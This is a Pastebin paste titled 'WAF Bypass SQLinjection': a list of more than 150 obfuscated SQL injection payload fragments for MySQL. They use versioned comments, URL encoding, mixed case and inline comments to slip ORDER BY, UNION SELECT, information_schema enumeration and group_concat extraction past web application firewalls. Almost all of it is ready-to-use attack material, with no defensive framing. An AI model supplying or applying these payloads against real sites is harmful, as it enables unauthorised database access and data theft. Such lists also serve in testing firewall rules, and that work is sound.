Advertisement
SeniorCritical-ZMK

WAF Bypass SQLinjection

Aug 14th, 2017
103
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.24 KB | None | 0 0
  1. [~] order by [~]
  2. /**/ORDER/**/BY/**/
  3. /*!order*/+/*!by*/
  4. /*!ORDER BY*/
  5. /*!50000ORDER BY*/
  6. /*!50000ORDER*//**//*!50000BY*/
  7. /*!12345ORDER*/+/*!BY*/
  8.  
  9. -------------------------------------------------------
  10.  
  11. [~] UNION select [~]
  12. /*!00000Union*/ /*!00000Select*/
  13. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  14. %55nion %53elect
  15. %55nion(%53elect 1,2,3)-- -
  16. +union+distinct+select+
  17. +union+distinctROW+select+
  18. /**//*!12345UNION SELECT*//**/
  19. /**//*!50000UNION SELECT*//**/
  20. /**/UNION/**//*!50000SELECT*//**/
  21. /*!50000UniON SeLeCt*/
  22. union /*!50000%53elect*/
  23. + #?uNiOn + #?sEleCt
  24. + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
  25. /*!%55NiOn*/ /*!%53eLEct*/
  26. /*!u%6eion*/ /*!se%6cect*/
  27. +un/**/ion+se/**/lect
  28. uni%0bon+se%0blect
  29. %2f**%2funion%2f**%2fselect
  30. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  31. REVERSE(noinu)+REVERSE(tceles)
  32. /*--*/union/*--*/select/*--*/
  33. union (/*!/**/ SeleCT */ 1,2,3)
  34. /*!union*/+/*!select*/
  35. union+/*!select*/
  36. /**/union/**/select/**/
  37. /**/uNIon/**/sEleCt/**/
  38. +%2F**/+Union/*!select*/
  39. /**//*!union*//**//*!select*//**/
  40. /*!uNIOn*/ /*!SelECt*/
  41. +union+distinct+select+
  42. +union+distinctROW+select+
  43. uNiOn aLl sElEcT
  44. UNIunionON+SELselectECT
  45. /**/union/*!50000select*//**/
  46. 0%a0union%a0select%09
  47. %0Aunion%0Aselect%0A
  48. %55nion/**/%53elect
  49. uni/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  50. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  51. %0A%09UNION%0CSELECT%10NULL%
  52. /*!union*//*--*//*!all*//*--*//*!select*/
  53. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  54. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  55. +UnIoN/*&a=*/SeLeCT/*&a=*/
  56. union+sel%0bect
  57. +uni*on+sel*ect+
  58. +#1q%0Aunion all#qa%0A#%0Aselect
  59. union(select (1),(2),(3),(4),(5))
  60. UNION(SELECT(column)FROM(table))
  61. %23xyz%0AUnIOn%23xyz%0ASeLecT+
  62. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
  63. union(select(1),2,3)
  64. union (select 1111,2222,3333)
  65. uNioN (/*!/**/ SeleCT */ 11)
  66. union (select 1111,2222,3333)
  67. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  68. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  69. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  70. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  71. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  72. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  73. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
  74. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
  75. /union\sselect/g
  76. /union\s+select/i
  77. /*!UnIoN*/SeLeCT
  78. +UnIoN/*&a=*/SeLeCT/*&a=*/
  79. +uni>on+sel>ect+
  80. +(UnIoN)+(SelECT)+
  81. +(UnI)(oN)+(SeL)(EcT)
  82. +’UnI”On’+'SeL”ECT’
  83. +uni on+sel ect+
  84. +/*!UnIoN*/+/*!SeLeCt*/+
  85. /*!u%6eion*/ /*!se%6cect*/
  86. uni%20union%20/*!select*/%20
  87. union%23aa%0Aselect
  88. /**/union/*!50000select*/
  89. /^.*union.*$/ /^.*select.*$/
  90. /*union*/union/*select*/select+
  91. /*uni X on*/union/*sel X ect*/
  92. +un/**/ion+sel/**/ect+
  93. +UnIOn%0d%0aSeleCt%0d%0a
  94. UNION/*&test=1*/SELECT/*&pwn=2*/
  95. un?+un/**/ion+se/**/lect+
  96. +UNunionION+SEselectLECT+
  97. +uni%0bon+se%0blect+
  98. %252f%252a*/union%252f%252a /select%252f%252a*/
  99. /%2A%2A/union/%2A%2A/select/%2A%2A/
  100. %2f**%2funion%2f**%2fselect%2f**%2f
  101. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  102. /*!UnIoN*/SeLecT+
  103.  
  104. ------------------------------------------------------
  105.  
  106. [~] information_schema.tables [~]
  107. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
  108. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
  109. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
  110. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
  111. /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  112. /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
  113.  
  114. ------------------------------------------------------
  115.  
  116. [~] concat() [~]
  117. CoNcAt()
  118. concat()
  119. CON%08CAT()
  120. CoNcAt()
  121. %0AcOnCat()
  122. /**//*!12345cOnCat*/
  123. /*!50000cOnCat*/(/*!*/)
  124. unhex(hex(concat(table_name)))
  125. unhex(hex(/*!12345concat*/(table_name)))
  126. unhex(hex(/*!50000concat*/(table_name)))
  127.  
  128. ------------------------------------------------------
  129.  
  130. [~] group_concat() [~]
  131. /*!group_concat*/()
  132. gRoUp_cOnCAt()
  133. group_concat(/*!*/)
  134. group_concat(/*!12345table_name*/)
  135. group_concat(/*!50000table_name*/)
  136. /*!group_concat*/(/*!12345table_name*/)
  137. /*!group_concat*/(/*!50000table_name*/)
  138. /*!12345group_concat*/(/*!12345table_name*/)
  139. /*!50000group_concat*/(/*!50000table_name*/)
  140. /*!GrOuP_ConCaT*/()
  141. /*!12345GroUP_ConCat*/()
  142. /*!50000gRouP_cOnCaT*/()
  143. /*!50000Gr%6fuP_c%6fnCAT*/()
  144. unhex(hex(group_concat(table_name)))
  145. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  146. unhex(hex(/*!12345group_concat*/(table_name)))
  147. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  148. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  149. unhex(hex(/*!50000group_concat*/(table_name)))
  150. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  151. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  152. convert(group_concat(table_name)+using+ascii)
  153. convert(group_concat(/*!table_name*/)+using+ascii)
  154. convert(group_concat(/*!12345table_name*/)+using+ascii)
  155. convert(group_concat(/*!50000table_name*/)+using+ascii)
  156. CONVERT(group_concat(table_name)+USING+latin1)
  157. CONVERT(group_concat(table_name)+USING+latin2)
  158. CONVERT(group_concat(table_name)+USING+latin3)
  159. CONVERT(group_concat(table_name)+USING+latin4)
  160. CONVERT(group_concat(table_name)+USING+latin5)
  161.  
  162.  
  163. Special Thanks to - Ko Root
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement